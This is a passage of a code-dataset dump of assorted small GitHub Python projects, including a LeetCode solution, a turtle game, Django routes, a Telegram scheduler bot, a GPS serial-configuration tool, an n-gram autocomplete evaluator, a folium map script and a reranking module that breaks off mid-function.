print(labels)\n markup = get_latex(labels.numpy())\n print(markup)\n# get_picture(markup)\n return jsonify({'markup':markup})\n\n\n@app.route('/testing', methods=['GET'])\ndef sauce():\n if request.method == 'GET':\n return jsonify({'markup':'hi'})\n@app.route('/')\ndef hello():\n content = get_file('test.html')\n return Response(content, mimetype=\"text/html\")\n# return \"hello worlds\"\nif __name__ == '__main__':\n app.run()\n","repo_name":"tejasvikothapalli/latex2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32873031368","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n \"\"\"\n Given a string input, s, the function returns the length of the \n longest substring within s.\n \"\"\"\n\n # Check for constraints\n if len(s) > 5e4:\n return -1\n\n # We will store the largest length substring with distinct\n # characters in this variable and return it in the end\n largest_substring_length = 0\n\n # We loop over the length of the string\n for i in range(len(s)):\n\n # The length will denote the length of the current substring \n # being counted. \n length = 0\n\n # The distinct characters will be stored and checked with the \n # list, distinct_chars. We will use the boolean distinct to help \n # us loop over each of the substrings until we detect a duplicate\n # character\n distinct_chars = []\n distinct = True\n\n # We loop over each substring with help of the variable, j, which\n # starts at the ith position\n j = i\n\n # While the characters being encountered are still distinct and\n # we are not going past the end of the string, s, we check if the\n # current character has been seen and append it to\n # distinct_chars if not. We increase the size of length by one. \n while distinct and j <= len(s)-1:\n \n if s[j] not in distinct_chars:\n \n distinct_chars.append(s[j])\n length += 1\n\n # If we encounter a duplicate character, then if the size of \n # length is larger than the global largest_substring_length \n # variable, then we redefine largest_substring_length to length.\n else:\n \n if length > largest_substring_length:\n largest_substring_length = length\n \n distinct = False\n\n j+=1\n \n # If it has reached the end without encountering a duplicate,\n # we must set largest_substring_length to length\n if length > largest_substring_length:\n largest_substring_length = length\n\n \n return largest_substring_length\n\nsol = Solution()\nprint(sol.lengthOfLongestSubstring('abcabcbb'))\nprint(sol.lengthOfLongestSubstring('bbbbb'))\nprint(sol.lengthOfLongestSubstring('pwwkew'))\nprint(sol.lengthOfLongestSubstring('au'))\nprint(sol.lengthOfLongestSubstring(''))\nprint(sol.lengthOfLongestSubstring(' '))","repo_name":"metalphase/small_code","sub_path":"longest_substring_without_repeats.py","file_name":"longest_substring_without_repeats.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15462278055","text":"from turtle import Turtle\nimport random\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nMAX_CARS = 30\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n\n def __init__(self):\n self.cars = []\n self.speed = STARTING_MOVE_DISTANCE\n self.rate = 1.0\n\n def decide_cars(self):\n if len(self.cars) >= MAX_CARS:\n return\n make_decide = random.randint(1, 10)\n if make_decide <= int(self.rate):\n rand_y = random.randint(-250, 280)\n while not self.is_clear(rand_y):\n rand_y = random.randint(-250, 280)\n self.make_car(rand_y)\n\n def make_car(self, ycor):\n new_car = Turtle('square')\n new_car.shapesize(stretch_len=2)\n new_car.color(random.choice(COLORS))\n new_car.penup()\n new_car.goto(280, ycor)\n new_car.setheading(180)\n self.cars.append(new_car)\n\n def move_cars(self):\n for i in range(len(self.cars) - 1, -1, -1):\n car = self.cars[i]\n if car.xcor() < -300:\n car.hideturtle()\n self.cars.remove(car)\n else:\n car.forward(self.speed)\n\n def inc_speed(self):\n self.speed += MOVE_INCREMENT\n self.rate = self.rate + 1\n\n def is_clear(self, y_pos, check_player=False):\n x_pos = 260\n if check_player:\n x_pos = 0\n for car in self.cars:\n if car.ycor() - 10 < y_pos < car.ycor() + 10 and car.xcor() - 20 < x_pos < car.xcor() + 20:\n return False\n return True\n","repo_name":"jgregory39/100DoC-Python","sub_path":"Day-23-Turtle-Crossing/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34977162748","text":"\"\"\"Testapi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom apiMang import views\nfrom django.conf.urls import url\nfrom django.conf.urls import url, include\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n url(r'^index/$', views.index),\n url(r'^login_action/$', views.login_action),\n url(r'^api_manage/$', views.api_manage),\n url(r'^accounts/login/$', views.index),\n url(r'^search_name/$', views.search_name),\n url(r'^project_manage/$', views.project_manage),\n url(r'^report_manage/$', views.report_manage),\n url(r'^logout/$', views.logout),\n url(r'^api/', include('apiMang.urls', namespace=\"apiMang\")),\n]\n","repo_name":"chenwei481/TestSquid","sub_path":"Testapi/Testapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"46946828853","text":"import time\nimport asyncio\nimport logging\n\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\nfrom pymongo.errors import ConnectionFailure\nfrom logging.handlers import RotatingFileHandler\n\n\nfrom better import Better, db_core\nfrom better.config import *\nfrom better.helpers.scheduler import scheduling_anime, scheduling_day_animes\n\nfrom pyrogram import idle\n\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"[%(asctime)s - %(levelname)s] - %(name)s - %(message)s\",\n datefmt=\"%d-%b-%y %H:%M:%S\",\n handlers=[\n RotatingFileHandler(\"better.log\", maxBytes=20480, backupCount=10),\n logging.StreamHandler(),\n ],\n)\n\n\nlogging.getLogger(\"apscheduler.executors.default\").disabled\n\nlogging.getLogger(\"pyrogram\").setLevel(logging.WARNING)\nlogging.getLogger(\"pyrogram.parser.html\").setLevel(logging.ERROR)\nlogging.getLogger(\"pyrogram.session.session\").setLevel(logging.ERROR)\n\n\nscheduler = AsyncIOScheduler(timezone=\"America/Sao_Paulo\")\nstart_time = time.time()\n\n\nasync def db_connect():\n \"\"\"Check Mongo Client\"\"\"\n try:\n logging.info(\"Conectando ao MongoDB\")\n await db_core.server_info()\n logging.info(\"Database conectada\")\n except (BaseException, ConnectionFailure) as e:\n logging.error(\"Falha ao conectar a database, saindo....\")\n logging.error(str(e))\n quit(1)\n\n\nasync def run_better():\n \"\"\"Start Bot\"\"\"\n try:\n await Better.start()\n except Exception as e:\n logging.error(e)\n await Better.send_message(\n chat_id=GP_LOGS, text=f\"[ Better Schedule ] Bot iniciado com sucesso ...\\nVersion: {VERSION}\"\n )\n logging.info(\"[ Better Schedule ] Bot iniciado com sucesso ...\\n\")\n\n\nasync def main():\n await db_connect()\n await run_better()\n scheduler.add_job(scheduling_day_animes, \"cron\", hour=11, id=\"beter_anime_day\")\n scheduler.add_job(scheduling_anime, \"interval\", minutes=1, id=\"better_scheduller\")\n scheduler.start()\n await idle()\n\n\nif __name__ == \"__main__\":\n asyncio.get_event_loop().run_until_complete(main())\n","repo_name":"KuuhakuTeam/BetterBot","sub_path":"better/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8810061389","text":"from mimain import install_and_load\ntry:\n import tinydb;\nexcept:\n tinydb = install_and_load('tinydb')\n\ndb = tinydb.TinyDB(\"segatest.json\")\n\ndef insertar_usuario(usuario):\n try:\n usuario[\"usuario\"] = usuario[\"usuario\"].trim().lower()\n db.insert(usuario)\n return \"OK\"\n except Exception as e:\n return str(e)\n\ndef listar():\n return db.all()\n\ndef logearse(usuario1, pwd1):\n try:\n login = tinydb.Query()\n return db.search((login[\"usuario\"] == usuario1) & (login[\"pwd\"] == pwd1))\n except Exception as e:\n return {\"code\": 500, \"errormsg\": str(e)}\n\ndef actualizar(usuario1, llave_usuario):\n try:\n login = tinydb.Query()\n db.update(usuario1, login[\"usuario\"] == llave_usuario)\n return \"OK\"\n except Exception as e:\n return {\"code\": 500, \"errormsg\": str(e)}\n\ndef obtener_usuario(usuario1):\n return db.search(tinydb.Query()[\"usuario\"] == usuario1)","repo_name":"alejandro-zapeta/test1python","sub_path":"miapp.py","file_name":"miapp.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42712125940","text":"#!/usr/bin/python3\n\nimport json\nimport yaml\nimport copy\nimport struct\nimport sys\nimport serial\nfrom enum import Enum\n\nclass TypeError(Exception): pass\nclass WidthError(Exception): pass\nclass RangeError(Exception): pass\nclass MapError(Exception): pass\nclass FixedValueError(Exception): pass\nclass SerialError(Exception): pass\n\nclass DataType(Enum):\n Char = 1,\n Byte = 2,\n Short = 3,\n Integer = 4,\n Float = 5,\n Double = 6,\n Array = 7\n\n @classmethod\n def parse(self, str):\n if(str == 'char'):\n return DataType.Char\n if(str == 'byte'):\n return DataType.Byte\n if(str == 'short'):\n return DataType.Short\n if(str == 'integer'):\n return DataType.Integer\n if(str == 'float'):\n return DataType.Float\n if(str == 'double'):\n return DataType.Double\n if(str == 'array'):\n return DataType.Array\n\n return None\n\nclass Constraint(Enum):\n Fixed = 1,\n Range = 2,\n Map = 3,\n\n @classmethod\n def parse(self, str):\n if(str == 'fixed'):\n return Constraint.Fixed\n if(str == 'range'):\n return Constraint.Range\n if(str == 'map'):\n return Constraint.Map\n\n return None\n\n\nENQ = b'\\x05'\nACK = b'\\x06'\nRESET = b'\\x00'\n\nclass Item:\n def __init__(self, name):\n # SCHEMA properties\n self.name = name\n self.dataType = None\n self.position = None\n self.width = None\n self.description = None\n self.defaultValue = None\n self.constraint = None\n self.policy = None\n # range constraint\n self.minValue = None\n self.maxValue = None\n # map constraint\n self.map = []\n # CONFIGURATION properties\n self.value = None\n\n def checkConstraint(self, value):\n if (self.constraint == Constraint.Range):\n if (value <= self.maxValue and value >= self.minValue):\n return True\n else:\n raise RangeError(\"Constraint error: value range\")\n elif (self.constraint == Constraint.Map):\n if (next((entry for entry in self.map if entry['value'] == value), False)):\n return True\n else:\n raise MapError(\"Constraint error: value not present in map\")\n if (type(value) == str):\n if (len(value) <= self.width):\n return True\n else:\n raise WidthError(\"Constraint error: width\")\n elif (self.constraint == Constraint.Fixed):\n raise FixedError(\"Constraint error: fixed value\") \n\n return False\n\n def assignValue(self, value):\n if (type(value) == int and (self.dataType == DataType.Short \\\n or self.dataType == DataType.Byte or self.dataType == DataType.Integer)):\n if self.checkConstraint(value):\n self.value = value\n return True\n elif (type(value) == float and (self.dataType == DataType.Float \\\n or self.dataType == DataType.Double)):\n if self.checkConstraint(value):\n self.value = value\n return True\n elif (type(value) == str and self.dataType == DataType.Char):\n if self.checkConstraint(value):\n self.value = value\n return True\n elif (type(value) == list and self.dataType == DataType.Array):\n if (len(value) != self.width):\n raise WidthError(\"Wrong array width\")\n return False\n for elem in value:\n if (self.checkConstraint(elem) == False):\n return False\n self.value = value\n return True\n # user can specify a map value with a 'tag' instead of value...\n elif (type(value) == str and self.dataType == DataType.Byte):\n for entry in self.map:\n if (\"tag\" in entry and entry['tag'] == value):\n self.value = entry['value']\n return True\n \n return False\n\n def __repr__(self):\n rep = ' Item\\n'\n rep += f' name: {self.name}\\n'\n rep += f' dataType: {self.dataType}\\n'\n rep += f' position: {self.position}\\n'\n rep += f' width: {self.width}\\n'\n rep += f' description: {self.description}\\n'\n if (self.defaultValue != None):\n rep += f' defaultValue: {self.defaultValue}\\n'\n if (self.policy != None):\n rep += f' policy: {self.policy}\\n'\n rep += f' constraint: {self.constraint}\\n'\n if (self.constraint == Constraint.Range):\n rep += f' minValue: {self.minValue}\\n'\n rep += f' maxValue: {self.maxValue}\\n'\n if (self.constraint == Constraint.Map):\n for entry in self.map:\n rep += f' {entry}\\n' \n rep += f' value: {self.value}\\n'\n return rep\n\nclass Record:\n def __init__(self, cmd, name, type=None):\n self.commandCode = cmd \n self.type = type\n self.name = name\n self.itemList = []\n self.length = 0\n\n def addItem(self, item):\n self.itemList.append(item)\n self.length += item.width\n\n def getItemByName(self, name):\n return next((item for item in self.itemList if item.name == name), False)\n\n \"\"\"\n Check correctness of record: each mandatory item must have a value set by configuration\n (no defaultValue)\n\n Return value: True - sanity check ok\n False - sanity check failed\n \"\"\"\n def checkSanity(self):\n for item in self.itemList:\n if ((item.policy == 'mandatory') and (item.value == None)):\n return False\n return True\n\n def __repr__(self):\n rep = f'Record(name={self.name}, type={self.type}, length={self.length})'\n return rep\n\nclass Schema:\n def __init__(self, filename):\n self.recordList = []\n self.load(filename)\n\n def load(self, filename):\n with open(filename) as f:\n jdoc = json.load(f)\n\n for record in jdoc:\n self.addRecord(record)\n\n def addRecord(self, record):\n if ('type' in record):\n r = Record(record['commandCode'], record['name'], record['type'])\n else:\n r = Record(record['commandCode'], record['name'])\n self.recordList.append(r)\n \n itemList = record['item']\n\n for item in itemList:\n i = Item(item['name'])\n i.dataType = DataType.parse(item['dataType'])\n i.position = item['position']\n i.width = item['width']\n i.description = item['description']\n if ('defaultValue' in item):\n i.defaultValue = item['defaultValue']\n if ('policy' in item):\n i.policy = item['policy']\n i.constraint = Constraint.parse(item['constraint']) \n if (i.constraint == Constraint.Range):\n i.minValue = item['minValue'] \n i.maxValue = item['maxValue'] \n if (i.constraint == Constraint.Map):\n for entry in item['map']:\n i.map.append(entry)\n i.value = None\n r.addItem(i)\n\n def getRecordByName(self, name):\n return next((copy.deepcopy(record) for record in self.recordList if record.name == name), False)\n\n def getRecordByType(self, type):\n return next((copy.deepcopy(record) for record in self.recordList if record.type == type), False) \n\nclass Config:\n def __init__(self, schema):\n self.recordList = []\n self.confData = []\n self.schema = schema\n\n \"\"\"\n Load configuration file in YAML format\n \n Record are allocated in recordList and configuration are applied locally\n\n Return value: True - if one or more item configurations are applied correctly\n False - if none of item configurations are applied\n \"\"\"\n def load(self, filename):\n with open(filename) as f:\n try:\n self.confData = yaml.load(f, Loader=yaml.FullLoader)\n except Exception as e:\n print(f\"E: error reading configuration file {filename} - {e}\")\n sys.exit(-1)\n\n for readEntry in self.confData:\n acceptRecord = False\n record = self.schema.getRecordByName(readEntry['record'])\n if (record):\n for readItem in readEntry.items():\n if (readItem[0] == 'record'): continue\n item = record.getItemByName(readItem[0])\n if (item):\n try:\n item.assignValue(readItem[1])\n except Exception as e:\n print(f\"E: Config.load() record:{record.name} item:{readItem[0]} value:{readItem[1]} wrong item value - {e}\")\n else:\n acceptRecord = True\n else:\n print(f\"E: Config.load() record:{record.name} item:{readItem[0]} wrong item name\")\n\n if (acceptRecord):\n if record.checkSanity():\n # copy record schema\n self.recordList.append(record)\n else:\n print(f\"E: record:{record.name} sanity check failed\")\n else:\n print(f\"E: Config.load() record:{readEntry['record']} wrong record name\")\n\n return (len(self.recordList) > 0)\n\nclass PacketBuilder:\n def encodeItem(self, value, dataType):\n retVal = bytearray()\n if (dataType == DataType.Char):\n retVal = bytes(value, 'utf-8')\n elif (dataType == DataType.Byte):\n retVal.append(value)\n elif (dataType == DataType.Short):\n retVal = struct.pack('>h', value)\n elif (dataType == DataType.Integer):\n retVal = struct.pack('>i', value)\n elif (dataType == DataType.Float):\n retVal = struct.pack('>f', value)\n elif (dataType == DataType.Double):\n retVal = struct.pack('>d', value) \n elif (dataType == DataType.Array):\n retVal = bytearray(value)\n\n return retVal \n\n def checksum(self, frame):\n # skip first frame element (STX)\n return (sum(frame[1:]) % 256)\n\n \"\"\"\n Build binary frame (from a record) to send by serial\n\n Return value: bytearray of encoded data \n \"\"\"\n def encodeRecord(self, record):\n frame = bytearray()\n # header of command \n frame.append(0x02) # 0: STX\n frame.append(0x00) # 1: STATUS\n frame.append(record.commandCode) # 2: PACKET TYPE\n frame.append(0x00) # 3: LENGTH (to calculate)\n\n if (record.commandCode == 0x64):\n\n frame.append(0x00) # 4: TRANSMISSION NUMBER\n frame.append(0x00) # 5: PAGE INDEX\n frame.append(0x00) # 6: MAXIMUM PAGE INDEX\n\n # file control information block\n frame.append(0x03) # 7: APPLICATION FILE SPECIFICATION VERSION\n frame.append(0x00) # 8: DEVICE TYPE (00h = all)\n frame.append(0x01) # 9: START APPLICATION FILE FLAG (01h = apply immediately)\n frame.append(0x00) # 10: FACTORY SETTINGS FLAG (00h = set only specified params)\n\n # application file record\n frame.append(record.type)\n frame.append(record.length) \n\n for item in record.itemList:\n if (item.value == None):\n value = item.defaultValue\n else:\n value = item.value\n\n # pad string with space (fixed length string)\n if (item.dataType == DataType.Char):\n value = value.ljust(item.width)\n\n # encode item value\n encValue = self.encodeItem(value, item.dataType)\n frame.extend(encValue)\n \n # trailer\n length = len(frame) - 4 \n frame[3] = self.encodeItem(length, DataType.Byte)[0]\n\n cksum = self.encodeItem(self.checksum(frame), DataType.Byte)\n frame.extend(cksum) # CHECKSUM\n frame.append(0x03) # ETX\n\n return frame\n\n def print(self, frame):\n s = frame.hex()\n print(' '.join(s[i:i+2] for i in range(0, len(s), 2)))\n \nclass SerialChannel:\n def __init__(self, port, baudrate, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE):\n try:\n self.serial = serial.Serial(port, baudrate, bytesize, parity, stopbits, timeout=1)\n except Exception as e:\n print(f\"E: error opening serial port {port} - {e}\")\n sys.exit(-1)\n\n if (self.reset() == False):\n print(f\"E: error resetting serial port {port}\")\n sys.exit(-1)\n \n def enquiry(self):\n self.serial.write(ENQ)\n res = self.serial.read(1)\n if (res == ACK):\n return True\n\n return False\n\n def reset(self):\n for i in range(1,256):\n self.serial.write(RESET)\n if (self.enquiry()):\n return True\n\n return False \n \n def sendFrame(self, frame):\n if (self.reset()):\n self.serial.write(frame)\n res = self.serial.read(1)\n if (res == b''):\n raise SerialError(f\"sendFrame error: frame not acknowledge\")\n elif (res != ACK):\n raise SerialError(f\"sendFrame error: frame not acknowledge - {ord(res)}\")\n else:\n raise SerialError(f\"sendFrame error: device busy or not connected\")\n","repo_name":"gtortone/spb2-utils","sub_path":"gps/lib/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":12935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1203099205","text":"import concurrent\nimport json\nimport nltk\nfrom nltk.corpus import brown\nimport pytrec_eval\nfrom tqdm import tqdm\n\nfrom utils.preprocess import cleansing, cleansing_test, preprocess_pipeline\nfrom utils.ngram_model import NGramModel\nfrom utils.helper import load_test\n\n\nif __name__ == \"__main__\":\n nltk.download('brown')\n\n # region Model Fitting\n new_list = brown.sents()\n min_freq = 6\n tokenized_sent = preprocess_pipeline(new_list)\n final_train, vocabulary = cleansing(tokenized_sent, min_freq)\n\n ns = [1, 2, 3, 5, 10]\n model_loc = 'models'\n\n for n in ns:\n model = NGramModel(n=n, model_loc=model_loc, vocabulary=vocabulary)\n model.fit(final_train)\n model.save_model()\n # endregion\n\n # region validation\n previous_tokens = [\"the\", \"jury\"]\n \n for n in ns:\n model = NGramModel(n=n, model_loc=model_loc, vocabulary=vocabulary)\n model.load_model()\n print(f\"{n}-gram model prediction: {model.get_suggestions(previous_tokens)}\")\n # endregion\n\n # region testing\n # Making prediction on all the birdbeck data Just checking success at k for all the predictions\n test_df = load_test(file_loc='data/APPLING1DAT.643')\n tokenized_sent = preprocess_pipeline(test_df['previous-tokens'].values.tolist(), remove_empty=False)\n final_test = cleansing_test(tokenized_sent, vocabulary)\n test_df['final-test'] = final_test\n\n queries = [{} for _ in ns]\n results_eval = [{} for _ in ns]\n\n for idx, n in enumerate(ns):\n model = NGramModel(n=n, model_loc=model_loc, vocabulary=vocabulary)\n model.load_model()\n\n argument_list = final_test\n suggestions = []\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for result in executor.map(model.get_suggestions, argument_list):\n suggestions.append(result)\n\n query = queries[idx]\n result_eval = results_eval[idx]\n for fill_in_word, test_previous_tokens, suggestion in tqdm(zip(test_df['fill-in-word'], final_test,\n suggestions), total=len(final_test),\n desc=f'Predictions-{n}-gram-model'):\n query[f\"{' '.join(test_previous_tokens)} *\"] = {fill_in_word: 1}\n result_eval[f\"{' '.join(test_previous_tokens)} *\"] = {}\n \n # to generate the example \n # print(test_previous_tokens)\n # print(fill_in_word)\n # print(suggestion)\n \n for word in [w[0] for w in suggestion[1]]:\n result_eval[f\"{' '.join(test_previous_tokens)} *\"][word] = 1\n\n for word in [w[0] for w in suggestion[5]]:\n if word not in result_eval[f\"{' '.join(test_previous_tokens)} *\"].keys():\n result_eval[f\"{' '.join(test_previous_tokens)} *\"][word] = 1 / 5\n\n for word in [w[0] for w in suggestion[10]]:\n if word not in result_eval[f\"{' '.join(test_previous_tokens)} *\"].keys():\n result_eval[f\"{' '.join(test_previous_tokens)} *\"][word] = 1 / 10\n\n print('#' * 20)\n print(f'Stats of {n}-gram model')\n print('#' * 20)\n evaluator = pytrec_eval.RelevanceEvaluator(query, {'success'})\n \n # # to print result for each test-sample\n # print(json.dumps(evaluator.evaluate(result_eval), indent=1))\n eval = evaluator.evaluate(result_eval)\n\n for measure in sorted(list(eval[list(eval.keys())[0]].keys())):\n print(measure, 'average:',\n pytrec_eval.compute_aggregated_measure(\n measure, [query_measures[measure] for query_measures in eval.values()])\n )\n print('#' * 20)\n # endregion\n","repo_name":"bandpooja/Auto_Completion","sub_path":"assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44524728751","text":"#Tan Hyong Hsing\n#20DDT21F1002\n\ncentimeters = float(input(\"Input the length in centimeters\\n\"))\nif centimeters >= 0 :\n inches = centimeters / 2.54\n two_decimal = round(inches ,2)\n print(two_decimal , \"inch\")\nelse :\n print(\"Sorry , your input is invalid . Please try again . \")\n#if centimeters < 0 :\n # print(\"Sorry , your input is invalid . Please try again . \")\n#else :\n # inches = centimeters / 2.54\n # print(inches , \"inch\")\n \nprint(\"Thank you for using our system.\")","repo_name":"TANHYONGHSING/legend","sub_path":"PYTHONPROJECT/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44820117656","text":"import sys\nfrom string import punctuation\n\n\ndef main():\n print(punctuation)\n punct = \"!\\\"#$%&'()*+,-./:;<=>?@[]\\\\^_`{|}~\"\n if len(sys.argv) == 1:\n string = input(\"What is the text to count?\\n\")\n arg = string\n else:\n arg = sys.argv[1]\n try:\n assert len(sys.argv) < 3, \"only one argument pls\"\n print(\"The text contains\", len(arg), \"characters:\")\n print(sum(1 for a in arg if a.isupper()), \"upper letters\")\n print(sum(1 for a in arg if a.islower()), \"lower letters\")\n print(sum(1 for a in arg if a in punct), \"punctuation marks\")\n print(arg.count(' '), \"spaces\")\n print(sum(1 for a in arg if a.isnumeric()), \"digits\")\n\n except AssertionError as msg:\n print(msg)\n\n\nmain.__doc__ = \"count all char: uppercase, lowercase, punctuation\\\n, spaces, digits\"\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Roymain/42_IA","sub_path":"Day0/ex05/building.py","file_name":"building.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11688673478","text":"#!/usr/bin/env python3.5.2\n# -*- coding: utf-8 -*-\nfrom collections import Counter\n\n\n#结果分析:\ndef resultType(result):\n\n count = 0\n indexNum = list()\n for kk in range(len(result)):\n if(result[count][result[count].argmax()]>=0.5):\n index = result[count].argmax()+1 #判断最大值是否大于0.5,大于则统计,不大于则舍弃\n indexNum.append(index)\n count += 1\n #统计分析最大值的出现次数与最大值下标,如果次数大于总结过次数的一半再减一,则返回下标,否则返回0;\n index=Counter(indexNum)\n if(index.__len__()!=0):\n maxIndex,maxValue=index.most_common(1).pop()\n if (maxValue >= len(result) / 2 - 1):\n return maxIndex\n else:\n return 0\n else:\n return 0\n","repo_name":"907231602/ApiDjangoSite","sub_path":"myApi/ResultAnalysis.py","file_name":"ResultAnalysis.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30063479627","text":"def read_file(filepath):\n with open(filepath) as f:\n lines = f.readlines()\n return [int(line.rstrip()) for line in lines]\n\n\ndef num_increases(data):\n count = 0\n\n for i, v in enumerate(data):\n if (i != 0 and v > data[i - 1]):\n count += 1\n \n return count \n\n\ndef sliding_window(data):\n count = 0\n curr_sum = data[0] + data[1] + data[2]\n prev_sum = 0\n\n for i, v in enumerate(data):\n if (i != 0 and i < len(data) - 2):\n curr_sum -= data[i - 1]\n curr_sum += data[i + 2]\n\n if (curr_sum > prev_sum):\n count += 1\n\n prev_sum = curr_sum\n\n return count\n\n\ndef main():\n data = read_file(\"day1.txt\")\n print(num_increases(data))\n print(sliding_window(data))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"jessicalally/advent-of-code-2021","sub_path":"day1/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70876273529","text":"import imp\nimport pandas as pd\nimport folium\nfrom folium.plugins import MiniMap\nfrom folium.plugins import MarkerCluster\n\n\n\nfilepath = r'F:\\OneDrive - 천안중앙고등학교\\pythonworkspace\\PROJECT\\대학지도제작PRJ\\학교주소좌표전환결과최종본.xlsx'\nexcel_file=pd.read_excel(filepath,engine='openpyxl', header=None)\n\nexcel_file.columns = ['학교이름', '주소', 'x', 'y', '웹페이지']\n\nname_list = excel_file['학교이름'].to_list()\naddr_list = excel_file['주소'].to_list()\nposition_x_list = excel_file['x'].to_list()\nposition_y_list = excel_file['y'].to_list()\n\nweb_list = excel_file['웹페이지']\n\nmap=folium.Map(location=[37,127],zoom_start=7)\nfor i in range(len(name_list)):\n if position_x_list[i] != 0:\n marker=folium.Marker([position_y_list[i],position_x_list[i]],\n popup='
'+name_list[i]+'
'+'
'+addr_list[i]+'
'+'
'+web_list[i]+'
',\n icon = folium.Icon(color='red', icon='star'))\n marker.add_to(map)\n\n\nminimap = MiniMap() \nminimap.add_to(map)\n\nmap.save(r'F:\\OneDrive - 천안중앙고등학교\\pythonworkspace\\PROJECT\\대학지도제작PRJ\\korea_university_map.html')","repo_name":"Kyong4612/CAJA-PRJ-1","sub_path":"4.모든대학표시하기.py","file_name":"4.모든대학표시하기.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28078994071","text":"import copy\nimport math\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom abc import ABC, abstractmethod\nfrom dataclasses import dataclass\nfrom datasets import Dataset\nfrom scipy.special import softmax\nfrom scipy.stats import zscore\nfrom transformers import pipeline\nfrom transformers.pipelines.pt_utils import KeyDataset\nfrom typing import Optional\nfrom tqdm import tqdm\n\nfrom ..utils import RegistryMixin, compute_f1_matrix_fast\nfrom .agent_utils import AgentBatchOutput\n\n\n# Can run without ray installed\nis_ray_installed = True\ntry:\n import ray\nexcept ImportError:\n is_ray_installed = False\n\n\n@dataclass\nclass DiversityConfig:\n n: int = 3\n s: int = 3\n tau: float = 10.0\n redundancy_penalty: float = 0.1\n embed_fn: Optional[callable] = None\n device: str = \"cuda\"\n\n\nclass DiversityStrategy(RegistryMixin, ABC):\n subclasses = {}\n requires_doc_embeds = False # Child classes should set this to True if they require doc embeds\n\n def __init__(self, config: DiversityConfig) -> None:\n super().__init__()\n self.config = config\n\n @abstractmethod\n def rerank(self, outputs: AgentBatchOutput, k: int) -> AgentBatchOutput:\n pass\n\n@DiversityStrategy.register_subclass(\"mmr\")\nclass MMR(DiversityStrategy):\n\n requires_doc_embeds = True\n\n def rerank(\n self, \n outputs: AgentBatchOutput, \n k: int\n ):\n doc_embeds = torch.tensor(outputs.doc_embeds).to(self.config.device)\n # BNM, BNM -> BNN\n inter_doc_scores = torch.bmm(doc_embeds, doc_embeds.transpose(1, 2)).cpu().numpy()\n #inter_doc_scores = np.einsum('BNM,BOP -> BNP', doc_embeds, np.transpose(doc_embeds, (0, 2, 1)))\n inter_doc_scores = zscore(inter_doc_scores, axis=2)\n doc_scores = np.array(outputs.doc_scores)\n doc_scores = zscore(doc_scores, axis=1)\n l = 0.5\n\n docs = outputs.docs\n batch_chosen_docs = []\n for i in range(len(docs)):\n chosen_idxs = []\n remaining_idxs = list(range(len(docs[i])))\n for k_ in range(k):\n if k_ == 0:\n idx = np.argmax(doc_scores[i])\n chosen_idxs.append(idx)\n remaining_idxs.remove(idx)\n continue\n\n best_idx, best_mmr = None, -99999.\n for idx in remaining_idxs:\n mmr = (1 - l) * np.argsort(np.max(inter_doc_scores[i, idx])) - l * np.argsort(doc_scores[i, idx])\n best_idx, best_mmr = max([(best_idx, best_mmr), (idx, mmr)], key=lambda x: x[1])\n\n chosen_idxs.append(best_idx)\n remaining_idxs.remove(best_idx)\n\n chosen_docs = [docs[i][idx] for idx in chosen_idxs]\n 